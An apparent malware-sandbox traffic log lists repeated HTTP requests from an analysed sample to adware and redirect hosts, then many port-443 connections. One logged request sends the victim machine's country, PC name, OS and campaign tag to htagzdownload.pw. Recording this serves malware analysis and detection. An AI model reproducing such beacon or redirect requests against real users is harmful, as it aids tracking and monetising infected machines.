Source: global traffic	HTTP traffic detected: GET /afu.php?id=1294231 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1492888&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1851483 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1343177&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1851513 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?id=1339680 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1620783&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /jump/next.php?r=2087215 HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /afu.php?id=1343178 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /jump/next.php?stamat=m%257C%252CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%252C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbur=0.8941180851075679&cbtitle=&cbiframe=0&cbWidth=1034&cbHeight=876&cbdescription=&cbkeywords=&cbref= HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /script/i.php?stamat=m%257C%252C%252Cg3PWYhE6oGU3BU9GH0dEdHP3xP.496%252CJ9Q8Q_UIgs9Kxcxyx-U4wQshKBKNG7-rYnaHixyxr6OH3VPRfwqQ_GzwHdPFlPRwWa5YU7zZdRMNDmj_4g5-h2wdkbz4dMJC0Fnhbe1neELDcqALiMA96kJC8cdtqOp1si_2RBYwy2ChjFCPi-ttcaIhRwhqQGPSaPYGkeLfZI13I_KMwt-_2ZpPRlduEaKwwVxJ3hmqpkoFZz7WR-XN4cWIYSoehHUTeiSRufDIuK6-ZcZlgq93EWKTszRNcRAnpS9DuIfFTDCOBbvQY9cXObu86hWi-C-HKoLKExk7eXxe_dxN-nGiZai-IBxKthk8inK9EddpeuzlMuf3EAqbFpqEEBcRT3UYmR6ypfVFabU3r55Ct7X_1lz8GPCzsfPdgAEWXXMLmEZvtRcz1E3Fa4rSLYHFiZml5KHWP_4RSIx925l41NlYou6QyD0qghav2U80t5X0TUB6ZYI74CNCvXDBqX9c-5JmRQvLGV5Wrx0%252C HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1851483 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1851513 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /jump/next.php?r=2087215 HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jump/next.php?stamat=m%257C%252CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%252C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbur=0.5357586367230445&cbtitle=&cbiframe=0&cbWidth=1034&cbHeight=876&cbdescription=&cbkeywords=&cbref= HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /script/i.php?stamat=m%257C%252C%252CwjKWoiZvoGU3BZ9GH0dEdHP3xP.5ac%252CtTPBIp8UNBXK7MDXTgz64xvdZ0u6aZ3TKc34Zz5N2qtMsjqES0bSmllnITSGq1EOZoFnXFIi5xUaKU_px33-bQHJxnCGSWtRYRqEtz7p8oiZRMbxQGIolIwDtRV81wyO7u1ngrI9yCLrOUwcVjQeU4bDvxEpjpAIJjxDAAp2Ai1U90zsNxFTwb--LTg5OmpzwmkiDjCR3Vn2v35SMu3wmzDrJK_5ZeoIu-DBXVXzL4EM6p0xsGzfd_8ZZ5OngKlcIHryXXS8j4LJksyOgtXhpmXPb5535EIKDaV7WHlTJseja-qaSXjg1BLvjBli8yi6bPvorf8Tvy6DeIKEJkZ5Ze2NsFbCSDGzpmSD9KQZiF-4U9mw3xw6uEIuPsgt2FDLDw88324J5R6EIcTmgvuFNFFlUxCik4xdpvFTWGjJY7p1-bB8XXb2--la7wZtf_EpvlhuQyO5CQ1YZieBfaLlmQ%252C%252C HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /afu.php?id=1294231 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1492888&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1343177&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?id=1339680 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1620783&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?id=1343178 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1851483 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1851513 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /?clickid=Uts05EylDxyIUKiWAaW7RzRhUkG3H5wBgxwYxU0&cm_mmc=aff-_-ir-_-1310690-_-77416&ref=imprad1310690&afn_sr=impact HTTP/1.1Host: www.abebooks.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jump/next.php?r=2087215 HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jump/next.php?stamat=m%257C%252CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%252C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbur=0.12477552690685689&cbtitle=&cbiframe=0&cbWidth=1034&cbHeight=876&cbdescription=&cbkeywords=&cbref= HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /script/i.php?stamat=m%257C%252C%252Cg3Z3d2a7oGU3Bv-GH0dEdHP3xP.3d3%252C9glu00p7OCSVcw7tiBE7G_X6_vJMkAgrSaSc9qMgw16cBpDefRb5oQr9kiBFuuP8BPUH2mxOZrKj410lIWL160ZP9QgZcmYNBDj_adXeShFhVxtDDWcTGwhgkxgg1sQhXHFj5yjJL1nelmJ2RT-FY_PnDru5fDFDdR2kKRzRlA-ZVtjNy5f0TSwW24hfufp5VneromdrOTcCro4yOTDzPHn7WkKIBFOrtF3sKYAN-q6jepgfBB95TkcTBeiw6-hM5laJ4OtyZLpUwc3Nq8WDYM9OIXAbrPVAAkByIDSNhqiowfd3yCAh81q--BD8eIPDPlmT9-ZinfIe0sXGj5CtQIxKkTu2YDq6iW1jzR-fuIclU5GZuVq4bE7aIwCd4z4fzaKKyb_qvMw-G4bLCpaHO_4Im2c0EDGuWRYpvrr4-bK3hshvclafesccSEKuKm-3Jka-xpS7fjGp-nrNDyGnOA-fAmPbvXQ1fOQVzVY41blaLs1bUIDzvaKPhR4HvGXg HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /afu.php?id=1294231 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1492888&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1343177&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /afu.php?id=1339680 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /SaveData/SaveData.php?ezzabour=%7B%22NameOffer%22:%22Acrons%22,%22ip%22:%22%22,%22country%22:%22CH%22,%22DateTime%22:%222022/01/14%2018:01%22,%22Device%22:%22835180%22,%22PCName%22:%22user%22,%22postcheck%22:%22False%22,%22tag%22:%22kenpachi2_lyla7_lylach7_irecord_goodchannel_registry_goodchannel_AdxpertMedia_Acrons%22,%22Os%22:%22WIN10%22,%22Browser%22:%22Chrome%22%7D HTTP/1.1Host: htagzdownload.pwConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1620783&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50738
Source: unknown	Network traffic detected: HTTP traffic on port 50726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50730
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 50452 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 50578 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50745
Source: unknown	Network traffic detected: HTTP traffic on port 50853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50747
Source: unknown	Network traffic detected: HTTP traffic on port 50440 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50740
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50741
Source: unknown	Network traffic detected: HTTP traffic on port 50325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50600 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 50738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50758
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50464 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50752
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 50439 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50768
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50762
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50761
